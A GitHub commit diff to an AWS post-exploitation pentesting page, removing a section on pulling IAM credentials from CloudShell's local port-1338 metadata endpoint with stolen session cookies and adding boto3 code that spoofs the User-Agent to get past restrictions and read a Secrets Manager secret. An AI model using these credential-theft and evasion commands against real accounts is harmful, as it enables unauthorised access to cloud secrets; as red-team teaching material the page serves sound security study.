Skip to content

Commit

Permalink
GITBOOK-721: No subject
Browse files Browse the repository at this point in the history
  • Loading branch information
@carlospolop @gitbook-bot
carlospolop authored and gitbook-bot committed Dec 2, 2024
1 parent ef6cb41 commit 2fe8365
Showing 1 changed file with 14 additions and 6 deletions.
20 changes: 14 additions & 6 deletions pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -101,16 +101,24 @@ aws-vault login jonsmith # Open a browser logged as jonsmith
You can also use **aws-vault** to obtain an **browser console session**
{% endhint %}

#### From Console to IAM Creds
### **Bypass User-Agent restrictions from Python**

[**Originally discovered in this post**](https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/), If you manage to compromise some access to a web console (maybe you stole cookies and could't access the .aws folder), you can obtain some IAM token credentials for that user through **CloudShell**.

CloudShell exposes IAM credentials via an **undocumented endpoint on port 1338**. After loading session cookies from the victim into your browser, you can navigate to CloudShell and issue the following commands to get IAM credentials.
If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of python boto3 library based on the user agent) it's possible to use the previous technique to **connect to the web console via a browser**, or you could directly **modify the boto3 user-agent** by doing:

{% code overflow="wrap" %}
```bash
TOKEN=$(curl -X PUT localhost:1338/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60")
curl localhost:1338/latest/meta-data/container/security-credentials -H "X-aws-ec2-metadata-token: $TOKEN"
# Shared by ex16x41
# Create a client
session = boto3.Session(profile_name="lab6")
client = session.client("secretsmanager", region_name="us-east-1")

# Change user agent of the client
client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'}) )

# Perform the action
response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])
```
{% endcode %}

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Expand Down

0 comments on commit 2fe8365

Please sign in to comment.